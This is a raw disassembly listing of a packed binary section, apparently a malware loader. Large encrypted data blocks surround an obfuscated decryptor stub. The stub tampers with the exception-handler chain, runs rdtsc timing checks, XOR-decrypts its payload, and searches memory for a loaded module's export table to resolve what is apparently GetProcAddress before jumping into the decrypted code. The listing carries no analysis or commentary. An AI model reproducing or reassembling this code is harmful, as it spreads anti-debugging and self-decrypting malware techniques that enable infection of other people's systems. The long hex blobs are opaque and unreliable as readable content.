0A8D43585h dd 232FC60Ah, 0F8C35083h, 807E11E4h, 0FF99EAF0h, 1C592015h dd 78B89F4Eh, 0A9030E5Eh, 2093427Fh, 56CD67B8h, 14D8BD86h dd 0AB3B5E16h, 7037FCB7h, 306299F0h, 87A562FCh, 944D5819h dd 0D8F4075Ah, 630F8669h, 0B89FFA43h, 2154F8C4h, 0C0698430h dd 8E1B63E3h, 1B15D23Eh, 0E4E3DE14h, 0F1DBB7CAh, 0C4F01B19h dd 0F8150276h, 949ECF3Bh, 0A5E90A17h, 0E434E510h, 0F98AC261h dd 5446BEE9h, 401C893Ah, 29EF7C08h, 143C04CAh, 5E76280h dd 68396907h, 73D87984h, 2D1D977Bh, 4C3C6126h, 4F6E5578h dd 91A09819h, 0DA19943Eh, 0D4FBEBACh, 4521BAE2h, 9968194Fh dd 0DC217947h, 4C86737Ch, 9B011A5Bh, 9DA91EB8h, 5B9F248Ch dd 340378A1h, 0CB39C552h, 1E072CE4h, 0AA40ADBEh, 0E7A34E82h dd 4EF0624Eh, 20004904h, 4E8E8153h, 6EB966F0h, 0DF41653Dh dd 0CD88596Fh, 0B8310A9Dh, 75F8BE2Ch, 0D0E1E542h, 0DCB23EC8h dd 0C8BFE296h, 0F47B5664h, 10F1FA32h, 0CEE70600h, 9D0D12EAh dd 0CC831E9Dh, 30512A69h dd 0B11F1AFAh, 85E16652h, 5443CDFAh, 88E943DEh, 6C576670h dd 480126B5h, 5E9F551h, 80F8EC37h, 7C687EA8h, 6A3C5D89h dd 0B72AAE40h, 0C7FCB814h, 0F08DFBA6h, 15FFCA7Dh, 100107Ch dd 0FF8Bh, 1564h dup(0) ; --------------------------------------------------------------------------- cmc push ebp mov ebp, esp call sub_3143A01A nop call sub_3143A0B5 clc mov ebp, 12FFC0h ; DATA XREF: sub_3143A01A+6w jmp loc_3143A051 ; =============== S U B R O U T I N E ======================================= sub_3143A01A proc near ; CODE XREF: UPX2:3143A004p push dword ptr fs:0 xor dword ptr ds:loc_3143A010+1, ebp cmc mov fs:0, esp xor edx, edx push 4000h push 80000000h push edx push edx push edx push 80h push 2 push 20h call ds:dword_31428090 ; GetProcAddress loc_3143A051: ; CODE XREF: UPX2:3143A015j clc jmp short $+2 sub eax, eax loc_3143A056: ; CODE XREF: sub_3143A01A+42j dec al or al, al jz short loc_3143A060 jnz short loc_3143A056 jmp short sub_3143A0C7 ; --------------------------------------------------------------------------- loc_3143A060: ; CODE XREF: sub_3143A01A+40j xchg ebx, ebx xchg ebx, ebx jmp short $+2 call sub_3143A06D mov eax, eax sub_3143A01A endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3143A06D proc near ; CODE XREF: sub_3143A01A+4Cp pop ebx stc add ebx, 6Ah xor ecx, ecx or ecx, 2990h cmc mov edx, 0B1h jmp short $+2 push ebx cmc loc_3143A087: ; CODE XREF: sub_3143A06D+2Aj call sub_3143A0C7 cmc nop stc add ebx, 1 dec ecx nop stc or ecx, ecx jnz short loc_3143A087 pop ebx xchg ebx, ebx clc clc mov edx, edx mov edx, [ebp-8] mov fs:0, edx mov edx, edx jmp short $+2 leave clc xchg ebx, ebx jmp ebx sub_3143A06D endp ; sp-analysis failed ; --------------------------------------------------------------------------- db 89h, 0C0h ; =============== S U B R O U T I N E ======================================= sub_3143A0B5 proc near ; CODE XREF: UPX2:3143A00Ap arg_C = dword ptr 10h mov ecx, [esp+arg_C] xor eax, eax pop dword ptr [ecx+0B8h] retn sub_3143A0B5 endp ; sp-analysis failed ; --------------------------------------------------------------------------- jmp short $+2 xchg ebx, ebx cld ; =============== S U B R O U T I N E ======================================= sub_3143A0C7 proc near ; CODE XREF: sub_3143A01A+44j ; sub_3143A06D:loc_3143A087p xchg al, [ebx] jmp short $+2 mov ecx, ecx xor ax, dx xchg ebx, ebx mov [ebx], al retn sub_3143A0C7 endp ; --------------------------------------------------------------------------- call $+5 mov eax, [esp] cld mov [eax+32C7h], ebx mov ecx, [eax+297Fh] mov ebx, [esp+4] and ecx, 10000000h jz short loc_3143A121 pop ecx mov [eax+32CBh], esi mov cl, [eax+2983h] mov [eax+32CFh], edi cmp cl, 0E8h jz short loc_3143A116 mov ebx, [eax+2985h] jmp short loc_3143A11F ; --------------------------------------------------------------------------- loc_3143A116: ; CODE XREF: UPX2:3143A10Cj add ebx, [eax+2984h] mov ebx, [ebx+2] loc_3143A11F: ; CODE XREF: UPX2:3143A114j mov ebx, [ebx] loc_3143A121: ; CODE XREF: UPX2:3143A0F4j push ebp mov ebp, eax sub dword ptr [esp+4], 80DAh sub ebp, 101005h mov edi, [esp+4] lea esi, [ebp+103990h] mov ecx, 0 rep movsb call sub_3143A1FA mov ecx, eax call sub_3143A1FA sub eax, ecx jz short loc_3143A1CC cmp eax, 100h ja short loc_3143A1CC and ebx, 0FFFFF000h loc_3143A160: ; CODE XREF: UPX2:3143A16Fj cmp dword ptr [ebx+4Eh], 73696854h jz short loc_3143A171 loc_3143A169: ; CODE XREF: UPX2:3143A17Ej sub ebx, 100h jnz short loc_3143A160 loc_3143A171: ; CODE XREF: UPX2:3143A167j mov eax, ebx add eax, [ebx+3Ch] mov edx, [eax+78h] cmp word ptr [eax], 4550h jnz short loc_3143A169 add edx, ebx mov esi, [edx+20h] mov ecx, [edx+18h] add esi, ebx push ecx loc_3143A18B: ; CODE XREF: UPX2:loc_3143A19Fj lodsd add eax, ebx cmp word ptr [eax+2], 5074h jnz short loc_3143A19F cmp dword ptr [eax+5], 6441636Fh jz short loc_3143A1A4 loc_3143A19F: ; CODE XREF: UPX2:3143A194j loop loc_3143A18B pop ecx jmp short loc_3143A1CC ; --------------------------------------------------------------------------- loc_3143A1A4: ; CODE XREF: UPX2:3143A19Dj sub [esp], ecx mov esi, [edx+24h] pop ecx add esi, ebx ; CODE XREF: UPX2:loc_3143A214j movzx eax, word ptr [esi+ecx*2] mov edi, [edx+1Ch] add edi, ebx mov esi, [edi+eax*4] add esi, ebx lea eax, [ebp+10113Fh] mov dx, [eax-17h] call sub_3143A1FF jmp short loc_3143A214 ; --------------------------------------------------------------------------- loc_3143A1CC: ; CODE XREF: UPX2:3143A151j ; UPX2:3143A158j ... mov eax, [ebp+103984h] and eax, 10000000h jz short loc_3143A1F8 mov edi, [esp+4] lea esi, [ebp+103988h] lodsd mov ebx, [ebp+1042CCh] stosd movsb mov edi, [ebp+1042D4h] mov esi, [ebp+1042D0h] loc_3143A1F8: ; CODE XREF: UPX2:3143A1D7j pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3143A1FA proc near ; CODE XREF: UPX2:3143A143p ; UPX2:3143A14Ap rdtsc retn sub_3143A1FA endp ; --------------------------------------------------------------------------- db 9Eh, 9Ah ; =============== S U B R O U T I N E ======================================= sub_3143A1FF proc near ; CODE XREF: UPX2:3143A1C5p push ebx mov ecx, 2845h mov ebx, edx loc_3143A207: ; CODE XREF: sub_3143A1FF+11j xor [eax], dl sub dl, bl xchg bl, bh inc eax xchg dl, dh loop loc_3143A207 pop ebx retn sub_3143A1FF endp ; --------------------------------------------------------------------------- loc_3143A214: ; CODE XREF: UPX2:3143A1CAj jbe short near ptr loc_3143A1AB+1 ; --------------------------------------------------------------------------- dw 0 dd 0A3A82562h, 0F9C05755h, 1209A84h, 0E6EF99AEh, 0C2F213FBh dd 0C5706226h, 0D75C2EFAh, 14419FCCh, 499283E7h, 0F8E9E628h dd 4DBAA159h, 800E004Bh, 5CF91E92h, 4DFFC256h, 871DC26Eh dd 0B2321FAAh, 0DF0454CDh, 0DD412499h, 249C8004h, 0F0534906h dd 0B3D4D3B2h, 772779F2h, 0C163BEC5h, 207084D0h, 692B4647h dd 0B8E85107h, 919BA3CAh, 2571EA1Eh, 0D08149C6h, 16F892D4h dd 0A4A979D7h, 1005951Eh, 0A744F6F7h, 88AD31A1h, 0E4CC6E7Fh dd 0A510EFADh, 0FF5416E2h, 580D6613h, 0B15FAE7Ah, 0E0B06FB6h dd 29A21102h, 7838001Ah, 7659578Bh, 9DB0BA70h, 0CC618AA7h dd 25F171D6h, 64C23027h, 0A8E06B5Eh, 0C84A5AFh, 0A6DD8DB9h dd 650C2E94h, 0F4DF1586h, 3C94D6E6h, 624CE57Dh, 0BCDF6DFAh dd 0A8E02A7Eh, 529283CBh, 0D400D216h, 6E2C9EB8h, 6665958Eh dd 19B4266Ch, 86FC0DD6h, 0A33CCED8h, 10002F13h, 234F6672h dd 9884899Fh, 64A17FEAh, 0BD10DABEh, 0ECC6CAE7h, 373D9136h dd 0B4B0AD18h, 684A0635h, 0A1BD06B1h, 0E8B3D7D3h, 4FC7AD0Ah dd 8067A332h, 0BE8B16Ch, 29B8C13Eh, 0C2E9711Ah, 43404AE0h dd 4C810666h, 5A577669h, 4E1BBE2Ah, 9851E0EEh, 3C1452B2h dd 89D8221Eh, 6209113Ah, 0A560AAC0h, 6EA08902h, 0D2E85284h dd 84C44E4Ah, 3A70EE0Eh, 10DC77D2h, 0B8F9E8C1h, 0B5BC4F32h dd 0B615E51Eh, 2444F6DCh, 1809B2ACh, 0DAFAEB95h, 0B5784A3Eh dd 955416F2h, 4818E0E7h, 0F785AE10h, 1FAA1034h, 0BC5AEC97h dd 0BBD9F9C6h, 7ABA6309h, 1FB0AA5Eh, 0DC764296h, 0A83EAAD6h dd 20B20E9Ah, 408C961Ah, 32F633DDh, 6DC572F6h, 0A41C297Ch dd 0CD5DC35Dh, 3C84E88Ch, 0E0CBAC47h, 0D41C6CCFh, 9E1287FDh dd 63A40652h, 386AD282h, 0C6A915CAh, 2FF07AB0h, 193B3722h dd 68683ACDh, 0AE64B51h, 70FF9A8Eh, 0E441E963h, 1388221Fh dd 7472386Fh, 316035AEh, 0C5FB13FDh, 45136226h, 944C1030h dd 11DFE05Dh, 10614983h, 73A8827Fh, 0D4528C87h, 6F39C9CEh dd 0D97BF7E3h, 28A8FB1Fh, 0F47D36F2h, 88FDD7DEh, 704369Dh dd 0AEC898A9h, 20FC41F3h, 9A536B6Dh, 0EBED55F2h, 90B2221Ch dd 417F5BB7h, 39D9BAEEh, 612486C2h, 47161F82h, 2FCAE1B5h dd 503DEE83h, 7A34B6D2h, 0ECBF0F3Dh, 39587CF1h, 90BDEE8Bh dd 0C5224AE2h, 9BA3D4A4h, 112E7CA8h, 0B0FA9EA5h, 7C26FA9Ah dd 22D469B6h, 7E18257Ah, 0E0A0123Eh, 0EC0E4E02h, 76424097h dd 8A7921DAh, 48B0BA70h, 0B434B291h, 0A838303Ah, 7496DA11h dd 0AA16D5h, 0EEEA648h, 0B04818B4h, 0A40C4C46h, 1A810A04h dd 0A96B86CDh, 8489C20h, 2B9937E5h, 0A1E7BE71h, 0D9290642h dd 3878C206h, 4202573h, 231FE18Eh, 9C59B7F7h, 0E5781206h dd 24288C5Fh, 50E0659Eh, 0A6E40C36h, 461DCDD9h, 0E14CEED4h dd 465956Eh, 0FCD5D99Ah, 0C8898A36h, 0F10F2EFAh, 15429FFAh dd 459696E5h, 9DC4FB30h, 936C3B6Dh, 90357A26h, 10410992h dd 0D7B8D214h, 0E442EC8Fh, 55BF0DDEh, 8C141884h, 5AA2F20Ch dd 1ADA2BD5h, 0D8E98AFEh, 2B1456B3h, 8451C35Dh, 0ABCBBA1Eh dd 305E206Bh, 6FD2B5C2h, 0A8D76423h, 0D3F81E4Ah, 6EEE7FF1h dd 0DCB1B6C2h, 6BBEE4E2h, 5ACE4AA4h, 88A46EE1h, 662EE688h dd 269E2759h, 24497E7Ah, 5803965Ah, 7C54137Ah, 0AB892B85h dd 22599740h, 95A06A01h, 8818C730h, 0A5B71E2h, 0C5C4AAF9h dd 10BE0D8Fh, 8C202612h, 0F8681380h, 3A69F1C9h, 0C5C0CA60h dd 3F0FFE2h, 0D06C0619h, 9B3ABB25h, 0B5380A7Eh, 6F6B29CFh dd 367E3709h, 5AF76EAAh, 0A1C8FEFFh, 93F30642h, 2856F493h dd 22B961CAh, 39F07AB0h, 634BCD92h, 68125816h, 3456CEB0h dd 1689AF4h, 47C46262h, 0C88858E2h, 0A0C7F280h, 48462851h dd 0FCD4A22Dh, 1270AB05h, 19A3D105h, 7035AB2Bh, 7DB59482h dd 0D23D6D16h, 476C4E34h, 1BF30A0Ah, 4ACAE6Dh, 288A2E56h dd 0F472E51Ah, 0C0405BDEh, 8C0426A2h, 58C8F266h, 24A53A2Ah dd 0F0508AEEh, 0EF4207B2h, 0B6EAB789h, 0D37EE2Ah, 55A03E52h dd 2FCA6439h, 0A195C70Bh, 7BFE1E5Ah, 404E609Bh, 50B13FD2h dd 0F892D4h, 0B4BC4E4Ch, 0EBEF7552h, 3E149697h, 7461C4CFh dd 0B2A9190Fh, 0D5E5264Fh, 830416B3h, 5826D023h, 4459277Ah dd 23A06A7Ch, 0DF05045Eh, 15495CA3h, 26A3BAEFh, 64D3CF24h dd 0A8222A61h, 0DC5B2785h, 8F629Ah, 2EA5B62Ch, 69F6E522h dd 9E2D0687h, 0E56952C3h, 15A2496Eh, 7AF1A253h, 453DCE9Fh dd 0BD6C1EDBh, 0A0A15D10h, 0DC17401h, 4A38B772h, 7749FDA5h dd 93F02BFDh, 0E8D55320h, 51D5073h, 6059BAB5h, 6165E8F6h dd 0BE876606h, 0FDFC5343h, 13E96BEh, 7310AECFh, 88B5F300h dd 0A7F73653h, 0F8394696h, 3312C9CEh, 5F94A7ECh, 0F8DCFD2Eh dd 0B005264Fh, 0F542429Ah, 1AF492F3h, 7CDDAE3Fh, 0A019E373h dd 0B33909B1h, 0D86943D6h, 58AD9F0Fh, 41E9CC6Ch, 8232E3A2h dd 0BC6D24D3h, 0CEAC4731h, 15F98253h, 4912CE8Ah, 8950F3A0h dd 0FFE813F5h, 0EDEA6A2Fh, 39238F62h, 5B34D3A8h, 81BEF6F3h dd 0DDE82B36h, 0C7807F73h, 23099287h, 7D64C7C2h, 80A21F22h dd 0B0D12F42h, 282073B5h, 0E688FD3h, 5AB9C213h, 0A1C5175Fh dd 0D8010102h, 8457792h, 2C98BFDAh, 75F7AA0Fh, 0AE112066h dd 0C6572BA5h, 99499Ah, 33B2BF08h, 49EAC94Bh, 9F48339Eh dd 0CB5A4ACFh, 15BD7F02h, 53F2B87Bh, 7C39CF84h, 957201D3h dd 0C18F767Eh, 0ECD4A26h, 411AB374h, 65619E8Bh, 0B5993CFEh dd 0DAD27925h, 681D6E7Fh, 5A59BE95h, 656CF3D8h, 0BCB4072Fh dd 0D9EF5C4Fh, 13CB1EAh, 5F629AC0h, 8FA7F311h, 0A7EA3236h dd 0E72F4B99h, 966C88Dh, 2C90B5F0h, 9BC7E016h, 0F71F2D6Fh dd 0E85564FCh, 39A7F6E6h, 44D18422h, 8008CF7Fh, 0B52233ACh dd 0CD7743D6h, 2CADA166h, 41E0D76Ch, 953DE3BAh, 0D97805B2h dd 0DBD85213h, 31E89D43h, 4D09EE93h, 0AA4BD2A7h, 0EC8D3EEFh dd 84C97323h, 311D845Bh, 795DE0A2h, 0AE9ECDE1h, 0B4D92233h dd 0F4F27348h, 0D288797h, 7B67DECAh, 8DBE296Ah, 0D9D62F5Ah dd 3254739Eh, 227CA3C2h, 44A8DD0Fh, 89D6134Ch, 0C903236Eh dd 134746B5h, 0AECB0EFh, 75C2E93Ah, 9A110273h, 0A85D2EBFh dd 6BF7AD4h, 25B4BB3Bh, 6FEBD472h, 0D83B0183h, 0D64F4AE4h dd 15A46B0Bh, 5FFBA462h, 4D2BD193h, 0A0526EC2h, 0C185483Dh dd 9F76336h, 5701A665h, 70629EA4h, 0B19518CDh, 0EFE15326h dd 1A287073h, 4759ADB5h, 744E9AEDh, 9AB4072Fh, 0D7FF574Fh dd 729AD8Ch, 5E7FA3DAh, 0B3A0D872h, 8EF60746h, 94394293h dd 106F8EF0h, 5EB4A8E7h, 8BCDF129h, 0AF030A79h, 0DE3044ABh dd 3984B9E6h, 4BDD9138h, 9A13E76Eh, 903414DEh, 0E97049D0h dd 319E8605h, 45F9CA58h, 9D35C782h, 0BC6D24DDh, 0FD895638h dd 1DE59C5Fh, 520FDC90h, 8550E7AFh, 0D7BC3CE9h, 84C27B21h dd 22279E40h, 4A51C2BBh, 9D8CF0FFh, 0D1F1223Bh, 0F9F27573h dd 2030B4E2h, 7B61DCF3h, 0B7A91A05h, 0DEF9385Ah, 3D3B4295h dd 1B7191D8h, 7AB5DC0Eh, 0B3F77A59h, 0CD101543h, 85D66B4h dd 2B80BD8Ah, 7FC3CF3Dh, 0A8111D71h, 0C65721D6h, 9F6BF4h dd 34A5BD5Eh, 78F7C94Ah, 0B9260B84h, 0D60C5BC7h, 70A6690Bh dd 58FAB341h, 6B37D1F6h, 0D4680BD1h, 0C5945437h, 18C16830h dd 4B07BE45h, 6A4DD6AFh, 0D09506EAh, 0F9C0581Bh, 1C1D6C64h dd 7748AB9Dh, 656EF4F1h dd 0A8A11201h, 0ECE94675h, 0A05FE8Fh, 5E62AFDAh, 8C9BE217h dd 0C8D90C53h, 0F12840B3h, 144594CCh, 4281B6CDh, 0B9C4E013h dd 0B002170Ah, 0F55E58ABh, 3D91A4E6h, 44D18432h, 0B03D8E7Fh dd 89101B88h, 0C82A1491h, 0AC8BE2Ah, 48CFD94Fh, 0BB35F981h dd 0EE142FD7h, 0F8974513h, 31D7805Fh, 6118FF87h, 8B41D4C2h dd 0CA8D27D7h, 0E8CD4833h, 28358F7Bh, 7966B693h, 9C9DD1F1h dd 0C1D02F0Ch, 0C1F85F7Bh, 0BA77B0E2h, 4E5EB0CCh, 0E5A6AAE1h dd 0A8E2B57Ch, 2CC1E9A4h, 0C318F2F4h, 428AF8BEh, 905F2C6Eh dd 12F1B91Ah, 0FB2802F8h, 86B2CE4Eh, 593DAA46h, 8DBC5DE9h dd 0A83842BEh, 50B08372h, 2AC0B05Dh, 5FD4F727h, 14C3778Ch dd 0F4D8B5FAh, 2190603Ah, 0A96B8560h, 8489C10h, 2B10AA39h dd 0B0DED4EBh, 64608542h, 0CCFD5FC5h, 372C8EF7h, 82F00047h dd 0AEB4063Ah, 39BC8916h, 647CA48Bh, 8318F0CFh, 0A6906EA2h dd 0D776228h, 645CC008h, 3300E2Dh, 0F31413A0h, 126FA0AFh dd 579E0DA2h, 88DFC9E9h, 0D31B3943h, 0F80D1649h, 0AC3C5E0Ah dd 90305822h, 5C9E2219h, 68D20EDDh, 0E47C8E72h, 924230DEh dd 606C26C8h, 32C8F214h, 74DFEF2Ah, 0CE861F11h, 0E54B56A2h dd 0B6FEB789h, 0AB19EE2Ah, 0ADEBCB8Ah, 0EC34934Ah, 2D655E65h dd 84BC0E4Ah, 3273B0Dh, 99BF642Dh, 0E8E8BC54h, 9C66C1D7h dd 0AB681A1Eh, 0C7BB191Dh, 8366823h, 0C343F36Ah, 58904A07h dd 83ABE9E8h, 76DE673Dh, 9B51AE6Ah, 0E0A05310h, 539B4FEAh dd 0B2AD9939h, 0C1ECCEB4h, 9D90DE8Eh, 0DC5D4D9Dh, 56CCAAD6h dd 0F177F165h, 40D0E48Ch, 7F066A7h, 0F100FD6Bh, 7BE43EAAh dd 0FB2FF590h, 695789F5h, 858A21Eh, 399D33BAh, 0A0F02162h dd 0E929CF71h, 3878CCA1h, 557DCA9Bh, 2FA13BDEh, 8C8A64C7h dd 4C7C8516h, 0A1A5B25h, 0C25D9A8Eh, 24916666h, 98883226h dd 2FA17FB7h, 5A10DAB5h, 0EA411B8Dh, 9898722Dh, 0B07CE3A8h dd 0E320D0BEh, 0EB82CA46h, 0E8B3CEC3h, 34C930Ah, 802B744Bh dd 76F4D292h, 427B9F56h, 0FD94D600h, 4D405ADEh, 72AE47E0h dd 9B3887AFh, 1BCC2B43h, 74558AFEh, 35565EBAh, 98E762E3h dd 977E193Ah, 206052ABh, 6D7986C2h, 0A8F3F76Bh, 0C031954Ah dd 0D370FA31h, 1C3C92AEh, 0E8410699h, 583D4E5Ah, 80801816h dd 4D408EB6h, 8DF7B2A6h, 0E4DC4010h, 341DB6A5h, 7C5512D6h dd 4872B2B6h, 14DCAA92h, 0B2F22C3Eh, 399B1102h, 78382CB0h dd 0D36117B9h, 10B0AB4Ah, 0DE1E2743h, 0C0392887h, 34FC0E9Ah dd 255250Ch, 9A84B61Ch, 833C8463h, 0A0646AFAh, 27D00A6Fh dd 1CB062CDh, 0F758A2F4h, 0C4234C2Fh, 6065637Eh, 78471036h dd 52BC5956h, 537DCCCAh, 6A6595D8h, 0C5B4266Ch, 0B80DC293h dd 12A9318Ch, 8D008AA0h, 9B962235h, 15D0764Ch, 644DFA7Dh dd 0F02361AEh, 0F8D8618h, 98C8329Dh, 0C40C7EAAh, 2AB505ECh dd 0ADE4D6BCh, 0F8AA9A82h, 0E018A10Ah, 82A5D5C6h, 0FF4E6ADh dd 17AA57A9h, 36218E0Ah, 0FEC05ADAh, 0CA0553A8h, 4D4C7FEDh dd 3D6FBE3Ah, 0E0501F63h, 6D1756A2h, 0C0ADD20h, 4B14E1FAh dd 2F60BAFFh, 0EC259646h, 82D6D286h, 4EA0E3Fh, 0D47FEA30h dd 1C34B7D3h, 9DD8BC16h, 8A3D08ABh, 0C7CE534Eh, 83CFA497h dd 5709F460h, 8E9DB041h, 0E3C61B2Eh, 435E830Dh, 7341E2A6h dd 0CB59A1BBh, 6DA07A3Eh, 0BC7ADD87h, 102878C6h, 44ECDE86h dd 854FF91Eh, 0DC644918h, 0A8384EEBh, 0CB79019Ah, 0A9C0DA5Eh dd 0C84A693h, 8A184C67h, 210368E3h, 70D00ACBh, 909C10B1h dd 8C57AFCAh, 0D41C6E23h, 53951A42h, 639E3AEEh, 38685E83h dd 242133CAh, 0EDD04AAEh, 0E8D15173h, 54D47D63h, 0B540BBFAh dd 682065E0h, 0BDB11216h, 0E88B4CA7h, 1163D1D0h, 0CF570CC6h dd 46E59972h, 0C8984526h, 6B0ECC0Dh, 701E502Bh, 7C24F582h dd 10F8C216h, 0C46C5E03h, 0FE47458Ah, 389599FEh, 322D3D56h dd 717C9E25h, 0F3762E1Eh, 0C881AF6Bh, 9C8E259h, 248EBE42h dd 0A601DB6Eh, 0A281A9E2h, 5D83249h, 448771AFh, 0E953EAFEh dd 0BE74D796h, 2D1703D7h, 84BC2018h, 0AF54EE89h, 0C0A9047h dd 683B7A96h, 0A4A939D7h, 43791B1Eh, 4D2EE788h, 6BF78159h dd 61D9816Eh, 83CA3EEEh, 0CF849D29h, 7448E1BDh, 91F1BF7h dd 5A2B7A2Eh, 0AC64470Eh, 7920984Dh, 0BCEFDE8Ah, 9BD06165h dd 0BDD285D9h, 4A7F47A2h, 0F7D2E56Fh, 0CB93D599h, 0D80FF1EEh dd 982226B6h, 5B666CFBh, 4E369F91h, 0B11FD622h, 8489CACh dd 0FF10AA39h, 0A709B9B1h, 6CCE0185h, 77E1D2EEh, 4B7F5DC9h dd 91A73EC8h, 0D1E87300h, 70A617Fh, 405AA1A9h, 6E69CDC2h dd 0BFB30906h, 0EAFD717Ah, 10229B98h, 4362AFF8h, 0A0BAF91Bh dd 0A4E81A73h, 0E6395C95h, 1241AEBEh, 6490A3E5h, 0F8DCE129h dd 946C5E08h, 40BF589Bh, 249B84E2h, 4196AF3Fh, 951BED68h dd 0B9383BB2h, 8C68568Ch, 138BBB28h, 48E1D60Ah, 883CE386h dd 0EF415CDBh, 0E9F87033h, 1AD5A170h, 49169CDEh, 0E651F2B0h dd 0B8E8BAD3h, 5F11E4Ah, 406E47E3h, 6BB170D2h, 0E8F89283h dd 8AC2DBA5h, 68411A0Eh, 267892FDh, 2EBD39B8h, 0BDCC6E54h dd 0C5BE7682h, 42D570D8h, 6B6DFF49h, 2BE613F7h, 962B7A2Eh dd 0CAC11100h, 0C8AD9F63h, 0CBECCEB2h, 887CCBh, 9AFD8C12h dd 5676CE2Ch, 96FDBF61h, 0A8903191h, 0F37B5D03h, 0D06C0E65h dd 4C484BAEh, 70D00A66h, 12D79061h, 814EEB2h, 0EA96FB45h dd 60EB3A6Eh, 6370B36h, 0AD978104h, 43CA0F8h, 3863BA71h dd 634BC8C5h, 687809FEh, 777A9DDAh, 2E53D5C1h, 0CC882A26h dd 0A602A7D9h, 18A4FEFAh, 0D8EF3550h, 32B6072h, 0DA44EFC9h dd 5D6F2EEAh, 22C87F33h, 7DB5C692h, 0A9F8C317h, 51930F5Bh dd 90201448h, 5CF4FD7Ah, 6DEB9756h, 0DA4EBD48h, 0C00C169Ah dd 0B28EB35Dh, 5220F276h, 538CBE2Ah, 9922FA9Dh, 0FD7222DCh dd 1D277276h, 548CD008h, 1E5A3F77h, 0DD2B86D2h, 0A195DF0Bh dd 1251E5Ah, 5060D54Eh, 96A14983h, 7BF892A8h, 0B4BC4A32h dd 0A35971Eh, 1544F6FBh, 272E0F2Bh, 26247E7Ah, 0D66FB5DBh dd 62399335h, 1818E2A6h, 0AB30BF9h, 6DA07A2Eh, 0BC7A6B97h dd 127C42C6h, 16ECB48Bh, 10B0A826h, 0F6E18992h, 2D3852E9h dd 5689545Ah, 5EA057D3h, 66D6A632h, 0B5FDFFE0h, 0F00C2EB4h dd 21805A38h, 12012960h, 5058B2C9h, 0EB3AFB45h, 25263A6Eh dd 6CB44705h, 38643A06h, 577B9ECAh, 0E3BB29C1h, 0D0F01860h dd 0FD87025Ah, 342CF050h, 7F20Dh, 79496662h, 98982AC7h dd 92F173B3h, 0D810DA90h, 32B634Fh, 0C8986EDEh, 0DA1579FAh dd 3465B4F7h, 60A882ACh, 723D6D46h, 416C4E34h, 0A5B4250Eh dd 0CFF4F690h, 28B8C73Eh, 0EBC9031Ah, 99404AC7h, 0B3169B2Fh dd 5E20F276h, 0A77341DFh, 0E06F9C53h, 381B56B2h, 88D82066h dd 550C02BBh, 4834BAFEh, 0EC2487C3h, 861EC779h, 402D1E5Ah dd 5070EB9Eh, 76E03D82h, 7D07D096h, 0B4AC714Ch, 0F5D9DA9Bh dd 5FCC8EEFh, 8DF7B2A6h, 0E4DC40C0h, 0D13A8C5h, 7C44089Dh dd 0C53197B6h, 4C2DDFFh, 755F2A3Eh, 0AC747900h, 0FC27D243h dd 44ECDF03h, 9BBCEAC5h, 53448912h, 0B8262D53h, 3379C89Ah dd 41C0CA1Fh, 0DEEA648h, 4DB7708Ch, 0A41C01A4h, 7F2FF2EDh dd 3C95B6B6h, 9DD531F6h, 0D40C70D1h, 0F3B22A14h, 525A93BDh dd 0F8EDD216h, 56C1BC5h, 6D7D6A8Eh, 9CA428DEh, 54900AA7h dd 5CC33120h, 9A0Ah dd 45224D3Ch, 67DC1612h, 74727C7Fh, 0AAAD47AEh, 4DD4866Ch dd 32858A37h, 1D1D105h, 6030E439h, 388CC6E8h, 0AAA89246h dd 0CEF9A159h, 1D303AF1h, 0D1E0D2D6h, 38FA2AC3h, 4273DE1Ah dd 0E404D1D4h, 84E4E7B6h, 4AC9B864h, 6E9EBC60h, 0D41481EDh dd 0B3F5D6BAh, 0D9D0C2B7h, 44B8AA31h, 0AD308801h, 0FC1BCE7Fh dd 0B8F4BA86h, 0AA891E4Ah, 7E509238h, 261498F2h, 0C6DDA7B3h dd 0CC993662h, 8AF33F3Eh, 20DA9A8h, 0E75FB286h, 0F4F244FFh dd 1C54CB2Eh, 165416F2h, 1B4FB2B6h, 2BD63B85h, 6D2B7A2Eh dd 0AC745392h, 63CB12ACh, 15E117E1h, 10B0AFA6h, 0B8515012h dd 576F42DCh, 64C2340Fh, 4C04595Eh, 648F4D72h, 0D84872E1h dd 0BAAC8327h, 23870A7Eh, 39E43CDh, 0C8DDA2E6h, 61913AC4h dd 0A0F00536h, 7934A3C1h, 0B568D216h, 146DD947h, 0BA3E418Eh dd 0CFE26752h, 577E97E9h, 0CCBFCECAh, 912FE49Eh, 794998E9h dd 98980D6Eh, 0CABEF35Ah, 0D870DADBh, 32B6C58h, 2B8F1057h dd 952BA3F3h, 0AFAB1055h, 916908A9h, 0F8B8AD0Eh, 33EBFAF9h dd 6F639325h, 4CCA0C07h, 5F054256h, 0F57C9E0Fh, 0F02870AAh dd 730426D7h, 48F658F3h, 63313E2Ah, 0F0509AAFh, 39D347C6h dd 88C83C19h, 549CEE3Ah, 61273F38h, 52486D2h, 4717AC8Eh dd 912C9B8Dh, 5070EA1Eh, 0DE6936D2h, 0E2F58292h, 0DBD26E15h dd 0EFA07471h, 2528C684h, 3829D7C0h, 8DB85E25h, 0C4B02F43h dd 1937369Dh, 3A7A87DAh, 35B9DA1Bh, 0C0807033h, 0E3446622h dd 155D61E6h, 649EBBE7h, 74C2CB29h, 0D1551877h, 0C45D10DCh dd 188860FFh, 2CB3A93Bh, 6DEC865Bh, 0F8310296h, 846850CBh dd 15A0720Bh, 52F5A251h, 7B788E82h, 0B0720FCEh, 9A875417h dd 66A92B62h, 5B1CB351h, 6342F7A2h, 0BC9C0BAEh, 0E5D55272h dd 0C166336h, 5355A0FAh, 202CEEF6h, 0ECB60904h, 0FDE14040h dd 443F9A84h, 5167EAE7h, 0F1EEE21Bh, 0ADF0353Ch, 0F57C4B88h dd 19009FCCh, 0CC8B3EDh, 9DC1E020h, 0FB1F3A64h, 0FD5F69EEh dd 15D4D7F7h, 5BD1E222h, 9915FA3Ah, 89607BBBh, 0AC7701D6h dd 3DBC930Ah, 862D160Bh, 0A5553FA2h, 1A007FDAh, 0E621A266h dd 0CD31A95Ah, 8674A99Ch, 0B0AD61D2h, 0D4240EFEh, 2E638588h dd 0A72563F1h, 27D40E2Fh, 504BD014h, 0B4BC4E82h, 80801A1Eh dd 4C44E6E2h, 1808B2A6h, 0E4CC7E6Ah, 0B0904A2Eh, 7C5416F2h dd 4818E2B6h, 14DCAE7Ah, 0E0A07A3Eh, 0AC644602h, 782812C6h dd 44ECDE8Ah, 10B0AA4Eh, 0DC747612h, 0A83842D6h, 